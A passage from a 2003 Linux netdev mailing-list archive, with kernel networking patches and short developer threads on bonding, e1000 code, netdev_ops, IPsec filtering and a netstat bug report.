arp_timer; - struct net_device_stats *stats; + struct net_device_stats stats; #ifdef CONFIG_PROC_FS struct proc_dir_entry *bond_proc_dir; struct proc_dir_entry *bond_proc_info_file; From amir.noam@intel.com Wed Jul 30 10:06:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:06:48 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH6iFl016213 for ; Wed, 30 Jul 2003 10:06:44 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2Ft24229 for ; Wed, 30 Jul 2003 17:02:16 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5Ci17241 for ; Wed, 30 Jul 2003 17:05:12 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010112309946 ; Wed, 30 Jul 2003 10:11:24 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 0/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:06:32 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302006.32692.amir.noam@intel.com> X-archive-position: 4381 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Hello, The following patches backport recent changes in the bonding code from 2.6 to 2.4, while fixing a few bugs (some from 2.4, some from 2.6). Patches apply on 2.4.22-pre9. 1 - Add list_for_each_entry_safe() 2 - Export alloc_netdev() 3 - Fix /proc read function 4 - Put the bond's net_device_stats inside the bond struct 5 - Use a linked list to handle numerous bond devices Amir From lunz@reflexsecurity.com Wed Jul 30 10:21:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:21:20 -0700 (PDT) Received: from crown.reflexsecurity.com ([69.15.40.52]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UHLEFl020471 for ; Wed, 30 Jul 2003 10:21:15 -0700 Received: from stoli.localnet ([192.168.0.106]) by crown.reflexsecurity.com with smtp (Exim 3.35 #1 (Debian)) id 19hueB-0006Kd-00; Wed, 30 Jul 2003 13:21:55 -0400 Received: by stoli.localnet (sSMTP sendmail emulation); Wed, 30 Jul 2003 13:21:10 -0400 From: "Jason Lunz" Date: Wed, 30 Jul 2003 13:21:10 -0400 To: scott.feldman@intel.com Cc: netdev@oss.sgi.com Subject: e1000 typo? Message-ID: <20030730172110.GA13929@reflexsecurity.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4387 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@reflexsecurity.com Precedence: bulk X-list: netdev The diff between the 5.1.11 and the newest e1000 drivers has this hunk: @@ -1999,7 +1996,7 @@ } #else for(i = 0; i < E1000_MAX_INTR; i++) - if(!e1000_clean_rx_irq(adapter) && + if(!e1000_clean_rx_irq(adapter) & !e1000_clean_tx_irq(adapter)) break; #endif is that intentional? I don't think it changes the code behavior, but it doesn't look right. -- Jason Lunz Reflex Security lunz@reflexsecurity.com http://www.reflexsecurity.com/ From scott.feldman@intel.com Wed Jul 30 11:24:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:24:29 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIOOFl024812 for ; Wed, 30 Jul 2003 11:24:24 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UIMCL20777 for ; Wed, 30 Jul 2003 18:22:12 GMT Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UIJMZ28437 for ; Wed, 30 Jul 2003 18:19:22 GMT Received: from orsmsx332.amr.corp.intel.com ([192.168.65.60]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073011241810470 ; Wed, 30 Jul 2003 11:24:18 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx332.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 30 Jul 2003 11:24:17 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: e1000 typo? X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Date: Wed, 30 Jul 2003 11:24:17 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: e1000 typo? Thread-Index: AcNWvvrz6ZMxsjO8S528qn3AP1oZ3QACIglg From: "Feldman, Scott" To: "Jason Lunz" Cc: X-OriginalArrivalTime: 30 Jul 2003 18:24:18.0008 (UTC) FILETIME=[C9C46D80:01C356C7] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6UIOOFl024812 X-archive-position: 4388 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > is that intentional? I don't think it changes the code > behavior, but it doesn't look right. It's intentional because && stops evaluating if left op is false which means we would leave Tx cleanup work when there was no Rx work. -scott From lunz@reflexsecurity.com Wed Jul 30 11:29:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:29:14 -0700 (PDT) Received: from crown.reflexsecurity.com ([69.15.40.52]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UITAFl025192 for ; Wed, 30 Jul 2003 11:29:10 -0700 Received: from stoli.localnet ([192.168.0.106]) by crown.reflexsecurity.com with smtp (Exim 3.35 #1 (Debian)) id 19hvhu-0006R9-00; Wed, 30 Jul 2003 14:29:50 -0400 Received: by stoli.localnet (sSMTP sendmail emulation); Wed, 30 Jul 2003 14:29:06 -0400 From: "Jason Lunz" Date: Wed, 30 Jul 2003 14:29:06 -0400 To: "Feldman, Scott" Cc: netdev@oss.sgi.com Subject: Re: e1000 typo? Message-ID: <20030730182906.GA14121@reflexsecurity.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 4389 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@reflexsecurity.com Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 11:24AM -0700, Feldman, Scott wrote: > It's intentional because && stops evaluating if left op is false which > means we would leave Tx cleanup work when there was no Rx work. ah. subtle yet obvious. :P -- Jason Lunz Reflex Security lunz@reflexsecurity.com http://www.reflexsecurity.com/ From willy@www.linux.org.uk Wed Jul 30 11:44:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:44:24 -0700 (PDT) Received: from www.linux.org.uk (IDENT:T5crCEYXo9ZONq9s/AfxeCCkK3uZubPx@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIiHFl026454 for ; Wed, 30 Jul 2003 11:44:18 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19hvvs-0004Wg-5I for netdev@oss.sgi.com; Wed, 30 Jul 2003 19:44:16 +0100 Date: Wed, 30 Jul 2003 19:44:16 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com Subject: netdev_ops retraction Message-ID: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 4390 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev So I've prototyped netdev_ops over a few drivers, and I don't like it. Here's why I don't like it: +struct netdev_ops { + struct net_device_stats * (*get_stats)(struct net_device *dev); + void (*uninit)(struct net_device *dev); + void (*destructor)(struct net_device *dev); + int (*open)(struct net_device *dev); + int (*stop)(struct net_device *dev); + int (*hard_start_xmit)(struct sk_buff *skb, struct net_device *dev); + int (*poll)(struct net_device *dev, int *quota); + int (*hard_header)(struct sk_buff *skb, struct net_device *dev, + unsigned short type, void *daddr, + void *saddr, unsigned len); + int (*rebuild_header)(struct sk_buff *skb); + void (*set_multicast_list)(struct net_device *dev); + int (*set_mac_address)(struct net_device *dev, void *addr); + int (*do_ioctl)(struct net_device *dev, struct ifreq *ifr, int cmd); + int (*set_config)(struct net_device *dev, struct ifmap *map); + int (*hard_header_cache)(struct neighbour *neigh, struct hh_cache *hh); + void (*header_cache_update)(struct hh_cache *hh, + struct net_device *dev, unsigned char * haddr); + int (*change_mtu)(struct net_device *dev, int new_mtu); + void (*tx_timeout)(struct net_device *dev); + void (*vlan_rx_register)(struct net_device *dev, struct vlan_group *grp); + void (*vlan_rx_add_vid)(struct net_device *dev, unsigned short vid); + void (*vlan_rx_kill_vid)(struct net_device *dev, unsigned short vid); + int (*hard_header_parse)(struct sk_buff *skb, unsigned char *haddr); + int (*neigh_setup)(struct net_device *dev, struct neigh_parms *); + int (*accept_fastpath)(struct net_device *, struct dst_entry*); + + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct net_device *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 (*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, u32 offset, u32 len, u8 *, u32 magic); + int (*set_eeprom)(struct net_device *, u32 offset, u32 len, u8 *, u32 magic); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam *); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam *); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32 (*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_count)(struct net_device *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + void (*get_strings)(struct net_device *, u32 stringset, u8 *); + int (*phys_id)(struct net_device *, u32); + int (*get_stats_count)(struct net_device *); + void (*get_ethtool_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; Never mind the additional pointer dereference in the code, this is just a horribly large data structure. Unless someone convinces me otherwise, I'm going to drop this idea and revert to doing ethtool_ops as a separate data structure. I think there's still scope for a netdev_ops patch, but it's of dubious value and more of a 2.7 project. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From garzik@gtf.org Wed Jul 30 11:50:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:50:15 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIo9Fl027912 for ; Wed, 30 Jul 2003 11:50:12 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 673406671; Wed, 30 Jul 2003 14:50:03 -0400 (EDT) Date: Wed, 30 Jul 2003 14:50:03 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030730185003.GA9253@gtf.org> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 4391 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox wrote: > Never mind the additional pointer dereference in the code, this is just > a horribly large data structure. Unless someone convinces me otherwise, > I'm going to drop this idea and revert to doing ethtool_ops as a separate > data structure. I think there's still scope for a netdev_ops patch, > but it's of dubious value and more of a 2.7 project. Definitely OK with me. And I think this is probably the best route for the moment, especially. Jeff From shemminger@osdl.org Wed Jul 30 12:51:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 12:51:51 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UJpmFl000806 for ; Wed, 30 Jul 2003 12:51:49 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6UJpZI08478; Wed, 30 Jul 2003 12:51:35 -0700 Date: Wed, 30 Jul 2003 12:51:35 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] export correct symbols when INET not enabled Message-Id: <20030730125135.6b5d1945.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4392 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Several symbols relating to multicast and netlink were hidden incorrectly under CONFIG_INET when in fact they are needed now by drivers and available even without TCP/IP. Patch against 2.6.0-test2 diff -Nru a/net/netsyms.c b/net/netsyms.c --- a/net/netsyms.c Wed Jul 30 12:47:00 2003 +++ b/net/netsyms.c Wed Jul 30 12:47:00 2003 @@ -513,20 +513,11 @@ #endif EXPORT_SYMBOL(rtattr_parse); -EXPORT_SYMBOL(rtnetlink_links); EXPORT_SYMBOL(__rta_fill); -EXPORT_SYMBOL(rtnetlink_dump_ifinfo); -EXPORT_SYMBOL(rtnetlink_put_metrics); -EXPORT_SYMBOL(rtnl); EXPORT_SYMBOL(neigh_delete); EXPORT_SYMBOL(neigh_add); EXPORT_SYMBOL(neigh_dump_info); -EXPORT_SYMBOL(dev_set_allmulti); -EXPORT_SYMBOL(dev_set_promiscuity); -EXPORT_SYMBOL(rtnl_sem); -EXPORT_SYMBOL(rtnl_lock); -EXPORT_SYMBOL(rtnl_unlock); /* ABI emulation layers need this */ EXPORT_SYMBOL(move_addr_to_kernel); @@ -534,7 +525,6 @@ /* Used by at least ipip.c. */ EXPORT_SYMBOL(ipv4_config); -EXPORT_SYMBOL(dev_open); /* Used by other modules */ EXPORT_SYMBOL(xrlim_allow); @@ -610,11 +600,22 @@ #endif EXPORT_SYMBOL(dev_base); EXPORT_SYMBOL(dev_base_lock); +EXPORT_SYMBOL(dev_open); EXPORT_SYMBOL(dev_close); EXPORT_SYMBOL(dev_mc_add); EXPORT_SYMBOL(dev_mc_delete); EXPORT_SYMBOL(dev_mc_upload); +EXPORT_SYMBOL(dev_set_allmulti); +EXPORT_SYMBOL(dev_set_promiscuity); EXPORT_SYMBOL(__kill_fasync); + +EXPORT_SYMBOL(rtnl); +EXPORT_SYMBOL(rtnetlink_links); +EXPORT_SYMBOL(rtnetlink_dump_ifinfo); +EXPORT_SYMBOL(rtnetlink_put_metrics); +EXPORT_SYMBOL(rtnl_sem); +EXPORT_SYMBOL(rtnl_lock); +EXPORT_SYMBOL(rtnl_unlock); #ifdef CONFIG_HIPPI EXPORT_SYMBOL(hippi_type_trans); From dax@gurulabs.com Wed Jul 30 13:37:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 13:37:10 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UKb4Fl004546 for ; Wed, 30 Jul 2003 13:37:04 -0700 Received: from randomip.foo.org (adsl-67-112-116-233.dsl.pltn13.pacbell.net [67.112.116.233]) by mail.gurulabs.com (Postfix) with ESMTP id B9F7E778B; Wed, 30 Jul 2003 14:37:02 -0600 (MDT) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? From: Dax Kelson To: Andreas Jellinghaus Cc: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <1059576701.4586.20.camel@simulacron> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> Content-Type: text/plain Message-Id: <1059597421.3284.7.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 14:37:02 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4393 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Wed, 2003-07-30 at 08:51, Andreas Jellinghaus wrote: > [netfilter] > incoming encrypted packets are seen as ESP/AH in INPUT > and then as decrypted packet in INPUT or FORWARD. Just to clarify, the packets will travel INPUT *twice* (once as ESP and then in the clear)? From dax@gurulabs.com Wed Jul 30 15:51:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 15:51:43 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UMpaFl015997 for ; Wed, 30 Jul 2003 15:51:37 -0700 Received: from randomip.foo.org (adsl-67-112-116-233.dsl.pltn13.pacbell.net [67.112.116.233]) by mail.gurulabs.com (Postfix) with ESMTP id 8FB1A778B; Wed, 30 Jul 2003 16:51:35 -0600 (MDT) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? From: Dax Kelson To: Andreas Jellinghaus Cc: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <1059597421.3284.7.camel@mentor.gurulabs.com> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> <1059597421.3284.7.camel@mentor.gurulabs.com> Content-Type: text/plain Message-Id: <1059605494.3284.141.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 16:51:34 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4394 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Wed, 2003-07-30 at 14:37, Dax Kelson wrote: > On Wed, 2003-07-30 at 08:51, Andreas Jellinghaus wrote: > > [netfilter] > > incoming encrypted packets are seen as ESP/AH in INPUT > > and then as decrypted packet in INPUT or FORWARD. > > Just to clarify, the packets will travel INPUT *twice* (once as ESP and > then in the clear)? If this is the case, then I see a problem. If you have an explicit drop/reject all the bottom (or have a DROP policy) of INPUT then no IPSEC traffic would be allowed. I supposed you could add a rule that allowed all ESP traffic before the the explicit drop. Dax From davem@redhat.com Wed Jul 30 16:02:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:02:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UN2eFl017065 for ; Wed, 30 Jul 2003 16:02:40 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id PAA03408; Wed, 30 Jul 2003 15:58:45 -0700 Date: Wed, 30 Jul 2003 15:58:44 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, hch@infradead.org, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-Id: <20030730155844.43ca22d9.davem@redhat.com> In-Reply-To: <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> References: <20030730102437.B3901@infradead.org> <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4395 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 10:32:31 -0400 chas williams wrote: > In message <20030730102437.B3901@infradead.org>,Christoph Hellwig writes: > >On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: > >Hmm, this looks like a fix for modular compilation and should > >probably go into 2.4.22.. > > i would prefer it to be applied to 2.4.22 but if it cant be done > it cant be done. i am not pressed. Modular ATM is a new attribute of 2.4.22, so if it is broken in some way we are no worse off than we were in 2.4.21 I really don't consider this critical at all. And itsy bitsy fixes like this continually pouring into Marcelo's tree in late stages are why his releases get delayed for so long, and I'm not going to contribute to that problem. From shemminger@osdl.org Wed Jul 30 16:19:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:19:14 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNJ6Fl018482 for ; Wed, 30 Jul 2003 16:19:07 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6UNIsI27725; Wed, 30 Jul 2003 16:18:54 -0700 Date: Wed, 30 Jul 2003 16:18:54 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] add likely/unlikely to pskb_may_pull Message-Id: <20030730161854.3cb03258.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4396 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Code that deals with received headers needs to be robust and use pskb_may_pull in many places, but except in the case of DOS attacks, the packets are always correctly formed so optimize for that case. diff -Nru a/include/linux/skbuff.h b/include/linux/skbuff.h --- a/include/linux/skbuff.h Wed Jul 30 15:50:31 2003 +++ b/include/linux/skbuff.h Wed Jul 30 15:50:31 2003 @@ -904,9 +904,9 @@ static inline int pskb_may_pull(struct sk_buff *skb, unsigned int len) { - if (len <= skb_headlen(skb)) + if (likely(len <= skb_headlen(skb))) return 1; - if (len > skb->len) + if (unlikely(len > skb->len)) return 0; return __pskb_pull_tail(skb, len-skb_headlen(skb)) != NULL; } From phased@mail.ru Wed Jul 30 16:23:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:23:57 -0700 (PDT) Received: from f9.mail.ru (f9.mail.ru [194.67.57.39]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNNmFl019128 for ; Wed, 30 Jul 2003 16:23:49 -0700 Received: from mail by f9.mail.ru with local id 19i0IM-000Mrl-00; Thu, 31 Jul 2003 03:23:46 +0400 Received: from [81.135.43.160] by eng.mail.ru with HTTP; Thu, 31 Jul 2003 03:23:46 +0400 From: =?koi8-r?Q?=22?=phased=?koi8-r?Q?=22=20?= To: netdev@oss.sgi.com Cc: linux-net@vger.kernel.org, davem@redhat.com, kuznet@ms2.inr.ac.ru, jmorris@intercode.com.au Subject: wierd netstat(/proc/net) behaviour Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: [81.135.43.160] Date: Thu, 31 Jul 2003 03:23:46 +0400 Reply-To: =?koi8-r?Q?=22?=phased=?koi8-r?Q?=22=20?= Content-Type: multipart/mixed; boundary="----JCeecgNp-TbYPINj0y99GJLqb:1059607426" Message-Id: X-archive-position: 4397 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: phased@mail.ru Precedence: bulk X-list: netdev ------JCeecgNp-TbYPINj0y99GJLqb:1059607426 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Whilst testing the 2.6.0-test1 kernel (I am sorry I am currently on dialup and have not had chance to test it on test2 yet) I experienced some very odd behaviour, namely entries vanishing from the list of established tcp connections. Please read the attached file, if this interests you, it is just one transcript of the behaviour although I have experienced it several times. I do not beleive the host has been compromised, I have compared the md5sum of netstat on both mine and a friends installation of Debian woody and both produce the same, as far as I am aware no one has developed kernel level malware for this version of the kernel in the form of lkms yet and the irratic behavour seems inconsistent of what a compromise may result in. fd2c999a20b1e9bbb395ee8389208923 /bin/netstat -rwxr-xr-x 1 root root 86892 Nov 24 2001 /bin/netstat I appologise if this is the wrong place to send such a bug, could you please forward it to the appropriate person. Regards phased ------JCeecgNp-TbYPINj0y99GJLqb:1059607426 Content-Type: application/octet-stream; name="netstatbug" Content-Disposition: attachment; filename="netstatbug" Content-Transfer-Encoding: base64 ClF1aWNrIG92ZXJ2aWV3IG9mIHdpZXJkIGNvbm5lY3Rpb24gbW9uaXRvcmluZyBiZWhhdmlvdXIK YnkgbWlzdGVyeAoKVXNpbmcga2VybmVsIDIuNi4wLXRlc3QxCgpjdXJyZW50bHkgdGhlcmUgaXMg YSBicm93c2VyIG9wZW4gdG8gMjA3LjE2Ni4yMDMuMTYwCmFuZCBhbiBJUkMgY29ubmVjdGlvbiB0 byAxOTUuNzEuOTkuMjEzCmJ1dCB0aGVyZSBpcyBhbHNvIGEgYm5jIGNvbm5lY3Rpb24gdG8gcG9y dCAxIG9mIDIxNi4xNDIuMjM3LjgwIG9mIHdoaWNoCmlzIG5vdyBzaG93aW5nIGluIHRoZSBsaXN0 CgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAg ICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTA1ICAgICAgMjA3LjE2Ni4yMDMuMTYwOjgwICAg ICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTEzICAg ICAgMTk1LjcxLjk5LjIxMzo2NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9tZS9taXN0 ZXJ4IyAKCgpvayBsZXRzIGNsb3NlIGFsbCBjb25uZWN0aW9ucwoKYmlnYm95Oi9ob21lL21pc3Rl cngjIG5ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgCgpJIG9w ZW4gYW4gc3NoIGNvbm5lY3Rpb24gdG8gYSByZW1vdGUgc3lzdGVtCgpiaWdib3k6L2hvbWUvbWlz dGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2 